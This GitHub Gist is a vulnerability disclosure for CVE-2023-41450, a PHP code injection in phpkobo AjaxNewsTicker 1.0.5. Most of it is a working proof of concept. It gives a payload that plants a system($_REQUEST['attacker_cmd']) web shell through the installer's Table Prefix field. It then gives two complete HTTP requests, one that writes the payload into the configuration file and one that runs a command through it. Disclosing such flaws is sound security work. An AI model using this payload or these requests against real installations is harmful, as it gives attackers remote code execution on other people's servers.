Last active
September 26, 2023 12:36
-
-
Save RNPG/e11af10e1bd3606de8b568033d932589 to your computer and use it in GitHub Desktop.
CVE-2023-41450
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Vulnerability Type: PHP Code Injection Vulnerability | |
Vendor of Product: phpkobo | |
Affected Product Code Base: AjaxNewsTicker | |
Product Version: 1.05 | |
Description: An issue in phpkobo AjaxNewsTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the reque parameter. | |
Attack Vectors: To exploit this vulnerability, the attacker should find the installation path/URL of AjaxNewsTicker component on the target via techniques such as forced browsing; Then the attacker configures the component and adds his/her desired PHP code in Table Prefix field and upon sending the request the injected PHP code will be executed. | |
Attack Type: Remote | |
Payload: ntic_";system($_REQUEST['attacker_cmd']);phpinfo();# | |
Assigned CVE-ID: CVE-2023-41450 | |
Discoverer: Alireza AmirHeydari, Raspina Net Pars Group (RNPG Ltd.) | |
Steps To Reproduce | |
Browse the the following URL: https://<target.xyz>/ntic/install/index.php | |
You can configures the component and add your desired PHP code in Table Prefix field in Database Settings -> Advanced Options section and upon sending the request the injected PHP code will be executed. | |
Request 1 | |
insert payload with this request into config.db.inc.php | |
POST /ntic/install/index.php?_be=1 HTTP/1.1 | |
Host: target.xyz | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 | |
Accept: application/json, text/javascript, */*; q=0.01 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
X-Requested-With: XMLHttpRequest | |
Content-Length: 897 | |
Origin: http://target.xyz | |
Connection: close | |
Referer: http://target.xyz/ntic/install/ | |
requ=%7B%22cmd%22%3A%22goto_page5%22%2C%22form%22%3A%7B%22db-hostname%22%3A%22localhost%22%2C%22db-database%22%3A%22test%22%2C%22db-username%22%3A%22root%22%2C%22db-password%22%3A%22test%22%2C%22db-tbl-prefix%22%3A%22ntic_%5C%22%3Bsystem(%24_REQUEST%5B'attacker_cmd'%5D)%3Bphpinfo()%3B%23%22%7D%2C%22wdata%22%3A%22%7B%5C%22start%5C%22%3A%7B%7D%2C%5C%22permcheck%5C%22%3A%7B%7D%2C%5C%22personal%5C%22%3A%7B%5C%22first_name%5C%22%3A%5C%22%5C%22%2C%5C%22last_name%5C%22%3A%5C%22%5C%22%2C%5C%22email%5C%22%3A%5C%22%5C%22%2C%5C%22time_zone%5C%22%3A%5C%22UTC%5C%22%7D%2C%5C%22dbsetup%5C%22%3A%7B%5C%22db-hostname%5C%22%3A%5C%22localhost%5C%22%2C%5C%22db-database%5C%22%3A%5C%22test%5C%22%2C%5C%22db-username%5C%22%3A%5C%22root%5C%22%2C%5C%22db-password%5C%22%3A%5C%22test%5C%22%2C%5C%22db-tbl-prefix%5C%22%3A%5C%22ntic_%5C%5C%5C%22%3Bsystem(%24_REQUEST%5B'attacker_cmd'%5D)%3Bphpinfo()%3B%23%5C%22%7D%7D%22%7D | |
Request 2 | |
Execution of payload during login request | |
POST /ntic/admin/index.php?_rtp=login&_be=1&attacker_cmd=dir%20%26%20whoami HTTP/1.1 | |
Host: target.xyz | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 | |
Accept: application/json, text/javascript, */*; q=0.01 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
X-Requested-With: XMLHttpRequest | |
Content-Length: 113 | |
Origin: http://target.xyz | |
Connection: close | |
Referer: http://target.xyz/ntic/admin/index.php?_rtp=login | |
requ=%7B%22cmd%22%3A%22login%22%2C%22form%22%3A%7B%22username%22%3A%22test%22%2C%22password%22%3A%22test%22%7D%7D |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment